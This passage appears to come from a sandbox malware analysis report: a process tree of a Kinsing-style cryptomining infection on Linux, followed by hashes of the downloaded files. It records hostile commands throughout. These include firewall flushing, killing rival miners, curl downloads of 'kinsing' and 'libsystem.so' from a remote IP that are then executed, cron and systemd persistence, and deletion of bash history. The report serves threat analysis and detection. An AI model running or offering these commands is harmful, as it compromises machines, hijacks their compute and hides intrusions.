PID:1670
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1671
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1673
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1674
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1675
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1676
-
-
-
-
/usr/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1679
-
-
/usr/bin/idid -u2⤵PID:1680
-
-
/usr/bin/grepgrep -v grep2⤵PID:1684
-
-
/usr/bin/grepgrep -e /dev2⤵PID:1683
-
-
/usr/bin/lsls -la /etc2⤵PID:1682
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1694
-
-
/usr/bin/grepgrep -v grep2⤵PID:1693
-
-
/usr/bin/grepgrep agetty2⤵PID:1692
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1695
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1691
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1707
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1713
-
-
/usr/bin/grepgrep -v -2⤵PID:1712
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1710
-
-
/usr/bin/grepgrep 207.38.87.62⤵PID:1709
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1711
-
-
/usr/bin/grepgrep -v -2⤵PID:1718
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1719
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1716
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1717
-
-
/usr/bin/grepgrep 127.0.0.1:520182⤵PID:1715
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1725
-
-
/usr/bin/grepgrep -v -2⤵PID:1724
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1723
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1722
-
-
/usr/bin/grepgrep 34.81.218.76:94862⤵PID:1721
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1731
-
-
/usr/bin/grepgrep -v -2⤵PID:1732
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1733
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1730
-
-
/usr/bin/grepgrep 42.112.28.216:94862⤵PID:1729
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1736
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1738
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1740
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1751
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1767
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1779
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1780
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1781
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1782
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1783
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1784
-
-
/usr/bin/pkillpkill -f .main2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1785
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1786
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1787
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1788
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1789
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1790
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1791
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1792
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1793
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1794
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1795
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1796
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1797
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1798
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1799
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1800
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1801
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1805
-
-
/usr/bin/grepgrep -v grep2⤵PID:1804
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1806
-
-
/usr/bin/grepgrep ./udp2⤵PID:1803
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
PID:1802
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1808
-
-
/usr/bin/catcat /tmp/.X11-unix/012⤵PID:1807
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1810
-
-
/usr/bin/catcat /tmp/.X11-unix/112⤵PID:1809
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1812
-
-
/usr/bin/catcat /tmp/.X11-unix/222⤵PID:1811
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1814
-
-
/usr/bin/catcat /tmp/.pg_stat.02⤵PID:1813
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1816
-
-
/usr/bin/catcat /tmp/.pg_stat.12⤵PID:1815
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1818
-
-
/usr/bin/catcat /data/./oka.pid2⤵PID:1817
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1819
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1820
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1821
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1822
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1823
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1824
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1825
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1830
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1829
-
-
/usr/bin/grepgrep -v grep2⤵PID:1828
-
-
/usr/bin/grepgrep ./oka2⤵PID:1827
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1826
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1835
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1834
-
-
/usr/bin/grepgrep -v grep2⤵PID:1833
-
-
/usr/bin/grepgrep "postgres: autovacum"2⤵PID:1832
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1831
-
-
/usr/bin/grepgrep -v proxymap2⤵PID:1842
-
-
/usr/bin/grepgrep -v postgres2⤵PID:1843
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1847
-
-
/usr/bin/grepgrep -v postgrey2⤵PID:1844
-
-
/usr/bin/grepgrep -v kinsing2⤵PID:1845
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1846
-
-
/usr/bin/grepgrep -v php-fpm2⤵PID:1841
-
-
/usr/bin/grepgrep -v "("2⤵PID:1840
-
-
/usr/bin/grepgrep -v "\\["2⤵PID:1839
-
-
/usr/bin/grepgrep -v bin2⤵PID:1838
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1837
-
-
/usr/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1836
-
-
/usr/bin/grepgrep -v proxymap2⤵PID:1854
-
-
/usr/bin/grepgrep -v postgres2⤵PID:1855
-
-
/usr/bin/grepgrep -v postgrey2⤵PID:1856
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1857
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1858
-
-
/usr/bin/grepgrep -v php-fpm2⤵PID:1853
-
-
/usr/bin/grepgrep -v "("2⤵PID:1852
-
-
/usr/bin/grepgrep -v "\\["2⤵PID:1851
-
-
/usr/bin/grepgrep -v bin2⤵PID:1850
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1849
-
-
/usr/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1848
-
-
/usr/bin/grepgrep -v proxymap2⤵PID:1865
-
-
/usr/bin/grepgrep -v postgres2⤵PID:1866
-
-
/usr/bin/grepgrep -v postgrey2⤵PID:1867
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1868
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1869
-
-
/usr/bin/grepgrep -v php-fpm2⤵PID:1864
-
-
/usr/bin/grepgrep -v "("2⤵PID:1863
-
-
/usr/bin/grepgrep -v "\\["2⤵PID:1862
-
-
/usr/bin/grepgrep -v bin2⤵PID:1861
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1860
-
-
/usr/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1859
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1874
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1873
-
-
/usr/bin/grepgrep /tmp/sscks2⤵PID:1872
-
-
/usr/bin/grepgrep -v grep2⤵PID:1871
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1870
-
-
/usr/bin/chmodchmod 777 /etc/kinsing2⤵PID:1879
-
-
/usr/bin/curlcurl -o /etc/kinsing http://80.71.158.12/kinsing2⤵PID:1880
-
-
/usr/bin/chmodchmod +x /etc/kinsing2⤵PID:2375
-
-
/usr/bin/chmodchmod 777 /etc/kinsing2⤵PID:2380
-
-
/usr/bin/curlcurl -o /etc/kinsing http://80.71.158.12/kinsing2⤵PID:2381
-
-
/usr/bin/chmodchmod +x /etc/kinsing2⤵PID:2383
-
-
/usr/bin/chmodchmod 777 /etc/libsystem.so2⤵PID:2392
-
-
/usr/bin/curlcurl -o /etc/libsystem.so http://80.71.158.12/libsystem.so2⤵PID:2393
-
-
/usr/bin/chmodchmod +x /etc/libsystem.so2⤵PID:2404
-
-
/usr/bin/chmodchmod 777 /etc/libsystem.so2⤵PID:2409
-
-
/usr/bin/curlcurl -o /etc/libsystem.so http://80.71.158.12/libsystem.so2⤵PID:2410
-
-
/usr/bin/chmodchmod +x /etc/libsystem.so2⤵PID:2433
-
-
/usr/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:2438
-
-
/usr/bin/chmodchmod 777 /etc/kinsing2⤵PID:2439
-
-
/usr/bin/chmodchmod +x /etc/kinsing2⤵PID:2440
-
-
/etc/kinsing/etc/kinsing2⤵PID:2441
-
-
/usr/bin/idid -u2⤵PID:2442
-
-
/usr/bin/systemctlsystemctl enable bot2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2443
-
-
/usr/bin/systemctlsystemctl start bot2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2469
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2473
-
-
/usr/bin/crontabcrontab -l2⤵PID:2471
-
-
/usr/bin/sedsed /base64/d2⤵PID:2472
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2487
-
-
/usr/bin/sedsed /_cron/d2⤵PID:2486
-
-
/usr/bin/crontabcrontab -l2⤵PID:2485
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2490
-
-
/usr/bin/sedsed /31.210.20.181/d2⤵PID:2489
-
-
/usr/bin/crontabcrontab -l2⤵PID:2488
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2497
-
-
/usr/bin/sedsed /update.sh/d2⤵PID:2496
-
-
/usr/bin/crontabcrontab -l2⤵PID:2495
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2500
-
-
/usr/bin/sedsed /logo4/d2⤵PID:2499
-
-
/usr/bin/crontabcrontab -l2⤵PID:2498
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2503
-
-
/usr/bin/sedsed /logo9/d2⤵PID:2502
-
-
/usr/bin/crontabcrontab -l2⤵PID:2501
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2506
-
-
/usr/bin/sedsed /logo0/d2⤵PID:2505
-
-
/usr/bin/crontabcrontab -l2⤵PID:2504
-
-
/usr/bin/sedsed /logo/d2⤵PID:2508
-
-
/usr/bin/crontabcrontab -l2⤵PID:2507
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2509
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2512
-
-
/usr/bin/sedsed /tor2web/d2⤵PID:2511
-
-
/usr/bin/crontabcrontab -l2⤵PID:2510
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2515
-
-
/usr/bin/sedsed /jpg/d2⤵PID:2514
-
-
/usr/bin/crontabcrontab -l2⤵PID:2513
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2518
-
-
/usr/bin/sedsed /png/d2⤵PID:2517
-
-
/usr/bin/crontabcrontab -l2⤵PID:2516
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2521
-
-
/usr/bin/sedsed /tmp/d2⤵PID:2520
-
-
/usr/bin/crontabcrontab -l2⤵PID:2519
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2524
-
-
/usr/bin/sedsed /zmreplchkr/d2⤵PID:2523
-
-
/usr/bin/crontabcrontab -l2⤵PID:2522
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2527
-
-
/usr/bin/sedsed /aliyun.one/d2⤵PID:2526
-
-
/usr/bin/crontabcrontab -l2⤵PID:2525
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2530
-
-
/usr/bin/sedsed /3.215.110.66.one/d2⤵PID:2529
-
-
/usr/bin/crontabcrontab -l2⤵PID:2528
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2533
-
-
/usr/bin/sedsed /pastebin/d2⤵PID:2532
-
-
/usr/bin/crontabcrontab -l2⤵PID:2531
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2536
-
-
/usr/bin/sedsed /onion/d2⤵PID:2535
-
-
/usr/bin/crontabcrontab -l2⤵PID:2534
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2539
-
-
/usr/bin/sedsed /lsd.systemten.org/d2⤵PID:2538
-
-
/usr/bin/crontabcrontab -l2⤵PID:2537
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2542
-
-
/usr/bin/sedsed /shuf/d2⤵PID:2541
-
-
/usr/bin/crontabcrontab -l2⤵PID:2540
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2545
-
-
/usr/bin/sedsed /ash/d2⤵PID:2544
-
-
/usr/bin/crontabcrontab -l2⤵PID:2543
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2548
-
-
/usr/bin/sedsed /mr.sh/d2⤵PID:2547
-
-
/usr/bin/crontabcrontab -l2⤵PID:2546
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2551
-
-
/usr/bin/sedsed /185.181.10.234/d2⤵PID:2550
-
-
/usr/bin/crontabcrontab -l2⤵PID:2549
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2554
-
-
/usr/bin/sedsed /localhost.xyz/d2⤵PID:2553
-
-
/usr/bin/crontabcrontab -l2⤵PID:2552
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2557
-
-
/usr/bin/sedsed /45.137.151.106/d2⤵PID:2556
-
-
/usr/bin/crontabcrontab -l2⤵PID:2555
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2560
-
-
/usr/bin/sedsed /111.90.159.106/d2⤵PID:2559
-
-
/usr/bin/crontabcrontab -l2⤵PID:2558
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2563
-
-
/usr/bin/sedsed /github/d2⤵PID:2562
-
-
/usr/bin/crontabcrontab -l2⤵PID:2561
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2566
-
-
/usr/bin/sedsed /bigd1ck.com/d2⤵PID:2565
-
-
/usr/bin/crontabcrontab -l2⤵PID:2564
-
-
/usr/bin/sedsed /xmr.ipzse.com/d2⤵PID:2568
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2569
-
-
/usr/bin/crontabcrontab -l2⤵PID:2567
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2572
-
-
/usr/bin/sedsed /185.181.10.234/d2⤵PID:2571
-
-
/usr/bin/crontabcrontab -l2⤵PID:2570
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2575
-
-
/usr/bin/sedsed /146.71.79.230/d2⤵PID:2574
-
-
/usr/bin/crontabcrontab -l2⤵PID:2573
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2578
-
-
/usr/bin/sedsed /122.51.164.83/d2⤵PID:2577
-
-
/usr/bin/crontabcrontab -l2⤵PID:2576
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2581
-
-
/usr/bin/sedsed /newdat.sh/d2⤵PID:2580
-
-
/usr/bin/crontabcrontab -l2⤵PID:2579
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2584
-
-
/usr/bin/sedsed /lib.pygensim.com/d2⤵PID:2583
-
-
/usr/bin/crontabcrontab -l2⤵PID:2582
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2587
-
-
/usr/bin/sedsed /t.amynx.com/d2⤵PID:2586
-
-
/usr/bin/crontabcrontab -l2⤵PID:2585
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2590
-
-
/usr/bin/sedsed /update.sh/d2⤵PID:2589
-
-
/usr/bin/crontabcrontab -l2⤵PID:2588
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2593
-
-
/usr/bin/sedsed /systemd-service.sh/d2⤵PID:2592
-
-
/usr/bin/crontabcrontab -l2⤵PID:2591
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2596
-
-
/usr/bin/sedsed /pg_stat.sh/d2⤵PID:2595
-
-
/usr/bin/crontabcrontab -l2⤵PID:2594
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2599
-
-
/usr/bin/sedsed /sleep/d2⤵PID:2598
-
-
/usr/bin/crontabcrontab -l2⤵PID:2597
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2602
-
-
/usr/bin/sedsed /oka/d2⤵PID:2601
-
-
/usr/bin/crontabcrontab -l2⤵PID:2600
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2605
-
-
/usr/bin/sedsed /linux1213/d2⤵PID:2604
-
-
/usr/bin/crontabcrontab -l2⤵PID:2603
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2608
-
-
/usr/bin/sedsed "/#wget/d"2⤵PID:2607
-
-
/usr/bin/crontabcrontab -l2⤵PID:2606
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2611
-
-
/usr/bin/sedsed "/#curl/d"2⤵PID:2610
-
-
/usr/bin/crontabcrontab -l2⤵PID:2609
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2614
-
-
/usr/bin/sedsed /zsvc/d2⤵PID:2613
-
-
/usr/bin/crontabcrontab -l2⤵PID:2612
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2617
-
-
/usr/bin/sedsed /givemexyz/d2⤵PID:2616
-
-
/usr/bin/crontabcrontab -l2⤵PID:2615
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2620
-
-
/usr/bin/sedsed /world/d2⤵PID:2619
-
-
/usr/bin/crontabcrontab -l2⤵PID:2618
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2623
-
-
/usr/bin/sedsed /1.sh/d2⤵PID:2622
-
-
/usr/bin/crontabcrontab -l2⤵PID:2621
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2626
-
-
/usr/bin/sedsed /3.sh/d2⤵PID:2625
-
-
/usr/bin/crontabcrontab -l2⤵PID:2624
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2629
-
-
/usr/bin/sedsed /workers/d2⤵PID:2628
-
-
/usr/bin/crontabcrontab -l2⤵PID:2627
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2632
-
-
/usr/bin/sedsed /oracleservice/d2⤵PID:2631
-
-
/usr/bin/crontabcrontab -l2⤵PID:2630
-
-
/usr/bin/grepgrep -v grep2⤵PID:2635
-
-
/usr/bin/grepgrep -e 185.191.32.1982⤵PID:2634
-
-
/usr/bin/crontabcrontab -l2⤵PID:2633
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2637
-
-
/usr/bin/rmrm -rf /root/.bash_history2⤵PID:2639
-
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:1878
-
/usr/bin/md5summd5sum /etc/kinsing1⤵PID:1877
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2379
-
/usr/bin/md5summd5sum /etc/kinsing1⤵PID:2378
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2387
-
/usr/bin/md5summd5sum /etc/kinsing1⤵PID:2386
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2391
-
/usr/bin/md5summd5sum /etc/libsystem.so1⤵PID:2390
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2408
-
/usr/bin/md5summd5sum /etc/libsystem.so1⤵PID:2407
-
/usr/bin/awkawk "{ print \$1 }"1⤵PID:2437
-
/usr/bin/md5summd5sum /etc/libsystem.so1⤵PID:2436
-
/usr/bin/crontabcrontab -l1⤵PID:2638
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
193B
MD5a3e1220eacdbd3fa5d0117efd5d4dd91
SHA1b66492d74a517bcd9d230b574b56411476124709
SHA25605d02411668f4ebd576a24ac61cc84e617bdb66aa819581daa670c65f1a876f0
SHA51278d27f45518a7fce636ef790ee215b1f47b2939e02cf6c5118897a703cc15ed4c283838d30a275e309304415d2a58e2e4a07d99127ec9ff32221d94e6547ca1f
-
Filesize
175B
MD503b520f9f7d5359db4091efa74fbd296
SHA19fb7a330704b2a9f88fdd34e65a601521bfaa702
SHA2568b975b3f06046403879ace044e6ecb93a5d3db859b6e44d9447e20a4767af42f
SHA5128774e9c82bc10c0b4e1653b59bc2cadd6ad670bbeef3ec68e129067883b7a478ae535409e5b72c2fa2b56878215dfd4c09a4e2f9be852e080c11c24e82a62d27
-
Filesize
250B
MD54bb29aed61ab7499ae9176c37dc21be8
SHA1ec472f8bd96cc88eef20e2330f8a9aa602b3d0e9
SHA256b77f8e33fe95d0137922a097fd56601f6959ff5161a5ce26edc16b5a17b2884f
SHA512b8d822619671554228c78eb75a362bb8c05d5006cfb5febb839b3a39afe7f0d74869c55f76164666b21fffa93759f31083167de4edf0c4d41a653e2021583408
-
Filesize
175B
MD56fefea2be33243ddbb0f920a7fbf43dd
SHA14906d2323cfeb660180eecdad779ffddb00197b1
SHA25613842fdbfff303c36f71272f83cf061a75156df5e3d6a4aaae892438d675ecd7
SHA512ec81e82c13d8957be8df0a0e3097fb501453bf61519afef91eb657a885ec131edcddb0b545ddbf376a89895ae78177cf6405e60400d0427fb05bf77f1024f7ea
-
Filesize
175B
MD5904ff350df7eddf6071f0dab77af807b
SHA16f6b08e23450a6a52db23f05a03d51c2d8d2779f
SHA25652096ff4bd994d15ca784642a894ce45ebe2fc94100d0f16eefa746522dada99
SHA5122de67c4cf76ec11a9a868f8537e55a62ecaca2fe37fa6f5e18720d459bc89edf1bfcc7c2299b5656aa6e30ba52cf712d8c7d064768ec2d124148ef358f5d356c